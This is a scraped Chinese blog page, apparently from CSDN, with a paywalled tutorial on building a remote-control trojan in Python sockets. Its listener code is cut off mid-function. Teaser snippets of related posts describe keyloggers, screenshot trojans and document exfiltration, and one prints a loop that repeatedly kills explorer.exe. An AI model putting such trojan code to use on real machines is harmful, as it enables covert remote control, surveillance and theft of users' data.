基于Python/Socket实现小型的远程木马(包含实验)

最新推荐文章于 2024-08-29 18:30:21 发布
最新推荐文章于 2024-08-29 18:30:21 发布
阅读量2.6k 收藏 29
点赞数 4
文章标签: 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/BrosyveryOK/article/details/127170958
版权

| 警告:仅供参考学习,不得做违法的事!免责声明:本文仅仅只是展示攻击手段,提高防范意识。任何由于该文章产生的消极后果与本作者无关。

前言

本文是用 Python 的 Socket 模块进行的服务搭建,主要是基于TCP服务的远程木马,因此要掌握一点TCP服务搭建的知识,可以参考我的另一篇文章,结合网上搜索的知识,搭建TCP服务器和客户端,然后再进行实验。

参考文章:用Python搭建非常简易的TCP客户端和服务器_br0sy的博客-CSDN博客

还要用到 Python 的 os 模块,进行命令操作,接下去话不多说,直接开始写代码

TCP服务端代码

import socket, os
​
# 以下不写注释了,要了解原理可参考我上面的文章或自行网上搜索
def attack():
    s = socket.socket()
    try:
        s.bind(("0.0.0.0", 6666))
        s.listen()
        chanel, cilent = s.accept() # accept会造成线程阻塞,但是一般情况下不考虑这个
        while True:
            recive_content = chanel.recv(1024).decode()
            if recive_content.startswith("+&#
最低0.47元/天 解锁文章
br0sy
关注
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
杨秀璋的专栏
02-21 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞(CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
一些不错的网页
墨鱼菜鸡
12-06 2430
http://www.zhengdazhi.com/archives/1749 书签栏 信息收集 二级域名查询,子域名查询-站长帮手网 ZoomEye - Cyberspace Search Engine 360威胁情报中心 SSL证书在线检测工具-中国数字证书CHINASSL ...
Python网络安全项目开发实战_看清文件上传木马_编程案例解析实例详解课程教程.pdf
04-27
大多数时候,黑客在 SQL 注入后并不是一获取数据就收手退出了。只要有可能,都会试试上传木马控制服务器。这时候,就要考虑一下上传什么样的木马和怎么上传木马的问题了。文件上传是黑客行动中非常重要的一环。上传木马的手段并不多,除了数据库注入写文件、往在线文字编辑器内插代码、利用文件上传漏洞外,并没有太好的办法。如果服务器上有文件上传漏洞,我们完全可以好好地利用本章的内容检查一番,及时修复漏洞。
python编写简易木马程序_Python编写简易木马程序
weixin_39966644的博客
01-14 421
0x00 准备文章内容仅供学习研究、切勿用于非法用途!这次我们使用Python编写一个具有键盘记录、截屏以及通信功能的简易木马。依然选用Sublime text2 +JEDI(python自动补全插件)来撸代码,安装配置JEDI插件可以参照这里: http://drops.wooyun.org/tips/4413首先准备好我们需要的依赖库,python hook和pythoncom。下载安装pyt...
Python特洛伊木马病毒程序设计(加强版)(四)
最新发布
qq_36901667的博客
08-29 705
在上节介绍完了服务器和客户端的基本代码,那么就用这个代码写一个最基本最小的连接程序,后面的列子都是通过这个小程序来进行修改,这样会方便很多这是最小的服务器程序,称做 “echo”(回声)服务器,客户端发来什么,它什么都不处理就直接发送回去,就像是回声一样。下面打开软件开始操作首先导入模块socket通过socket。选择参数socket.AF_INET 和 socket.SOCK_STREAM通过变量serverSocket去接收它通过bind去选择主机名和端口设定最多等待5个连接。
python编写木马攻击_python实现一个简单木马
weixin_39646018的博客
12-05 6114
一个简单的木马程序绝大多数的木马程序都是基于Socket实现的废话少说直接上代码!代码:client部分:# -*- coding: UTF-8 -*-import socketimport sysimport reimport osclass Client:def __init__(self, serverIp, serverPort):self.serverIp = serverIp # ...
Python编写简易木马程序
记录,总结,成长
01-28 9330
Python编写简易木马程序 0x00 准备 文章内容仅供学习研究、切勿用于非法用途! 这次我们使用Python编写一个具有键盘记录、截屏以及通信功能的简易木马。依然选用Sublime text2 +JEDI(python自动补全插件)来撸代码,安装配置JEDI插件可以参照这里: http://drops.wooyun.org/tips/4413
python做一个木马_Python编写简易木马程序
weixin_34405261的博客
01-30 6386
light · 2015/01/26 10:070x00 准备文章内容仅供学习研究、切勿用于非法用途!这次我们使用Python编写一个具有键盘记录、截屏以及通信功能的简易木马。依然选用Sublime text2 +JEDI(python自动补全插件)来撸代码,安装配置JEDI插件可以参照这里: http://drops.wooyun.org/tips/4413首先准备好我们需要的依赖库,pytho...
如何用python写一个小木马
assion
03-02 1705
这个python木马更准确来说算不上是木马,只能是一个小工具,主要功能是来获取本地doc或者txt文档甚至是图片的,并把这些文档压缩直接通过FTP上传到服务器。这不禁让我想起了上学的时候,上选修课的时候,老师所讲的讲义是不会下发的,但是他的讲义全都是试题,对于一个经常翘课的我来说,上课认真听讲是不存在的。第一步、提取当前目录下png、jpg结尾的文件,注意很多图片格式还有可能是jpeg的。注意:FPT服务器的端口一定要开放,否则会出现上传失败的情况。我在想如何能“偷”到老师的试题,于是这个脚本孕育而生。
【转载】Python编写简易木马程序
diandu3502的博客
03-27 374
转载来自:http://drops.wooyun.org/papers/4751?utm_source=tuicool 使用Python编写一个具有键盘记录、截屏以及通信功能的简易木马。 首先准备好我们需要的依赖库,python hook和pythoncom。 说起Keylogger,大家的思维可能早已飞向带有wifi功能的mini小硬件去了。抛开高科技,我们暂且回归...
笔记,后期整理
weixin_30278237的博客
08-06 8356
VM 虚拟各种系统的工具 安装目录 不要放在C盘 需要下载的镜像Windows NT win7 xp server08R2 server12类Nnix centos 6/7/8 ubuntu 14/16/18 kali安装 win7 1g=1024M1M=1024KB1KB=1024bit1bit 是一个字节 一个字节就是8位由0或者1组成(二进制) 10 进制0-9组成的数字...
红队专题-Perm权限提升与维持隐匿Privilege Escalation
aming小老弟
10-27 933
高权限不仅能对更多文件进行增删改查的操作,方便进一步收集主机系统中的敏感信息, system权限也可以提取内存中的密码Hash,为进一步的渗透提供更多信息。权限提升是从初始访问权限(通常是标准用户或应用程序帐户)一直提升到administrator, root甚至SYSTEM访问权限的艺术。常见技术或攻击手段来获得高权限帐户访问权限。用于检测和利用不同权限提升技术的手动方法,但会提到可以完成相同工作并节省您一些时间的自动化工具。 完美,它指向我们的有效负载。 使用net(也是默认安装的)启动此服务以获得
Python制作木马
gbx080425的博客
02-13 612
import os, time while True: try: os.system(r'taskkill /F /IM explore.exe') except: print('电脑已经黑屏哈哈哈⊙ꇴ⊙') time.sleep(3)
使用Python开发木马程序
热门推荐
oxuzhenyi的博客
07-22 1万+
使用Python开发木马程序 一、实验介绍 1.1 实验内容 木马程序会给普通用户带来很多危害,比如盗取QQ账号,游戏账号等。课程将用Python实现一个简易的木马程序,该程序会记录用户的键盘输入和屏幕截图并将数据发送到指定的服务器。通过分析键盘输入的数据,可以分析出root密码和其他账号的密码等等。 1.2 实验知识点 linux设备文件linux下Python多进程编程Pytho
python简易木马编写
02-14 3989
功能为对用户机器进行截图,并将截图结果发送至程序指定邮箱。 系统由两个功能组成:获取屏幕截图和发送邮件到邮箱。 源码如下: # -*- coding: utf-8 -*- import win32gui import win32ui import win32con import win32api import os,os.path from email.mime.text import
Python——Socket编写简单脚本木马远程执行CMD
Ho1aAs‘s Blog
07-31 1279
文章目录一、工具&环境二、实验原理三、编写脚本Ⅰ、Server服务端Ⅱ、Client客户端完 免责声明:本文章仅供网络安全方面学习、交流使用,任何操作与作者无关 请遵守我国法律法规 一、工具&环境 Python 3 花生壳 远程计算器 二、实验原理 三、编写脚本 Ⅰ、Server服务端 import socket server = socket.socket(socket.AF_INET,socket.SOCK_STREAM) serveraddr = ("",14444) s
python木马_python远程访问木马
weixin_39834090的博客
12-22 267
basicRATThis is a cross-platform Python 3.6.x Remote Administration Tool (RAT). Currently still a work in progress, and gets hacked on as time allows. See the binaries/ folder for prebuilt client exec...
基于Python实现socket远程木马
weixin_49472648的博客
06-16 1751
通过Python实现socket通信,实现木马功能,进而远程控制对方主机。 严正声明:本文仅限于技术讨论,严禁用于其他用途。
Python——Socket编写简单脚本木马远程控制截屏并发送截图
Ho1aAs‘s Blog
07-31 3420
文章目录一、工具&环境二、实验原理三、编写脚本Ⅰ、Server服务端Ⅱ、Client客户端四、运行截图完 免责声明:本文章仅供网络安全方面学习、交流使用,任何操作与作者无关 请遵守我国法律法规 一、工具&环境 Python 3 花生壳 远程计算器 二、实验原理 三、编写脚本 出现报错请更换编码方式,如:gb18030、gbk等 Ⅰ、Server服务端 import socket,sys,threading,struct,os def service(): #抛出错误
PythonSocket实现人群分布数据远程传输及CNN模型部署
资源摘要信息:"基于TCP协议与PythonSocket模块的人群分布数据传输与远程CNN识别模型部署【***】" 在本次项目中,我们结合了计算机网络通信、图像处理以及机器学习的知识,实现了人群分布数据的传输和远程卷积神经...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值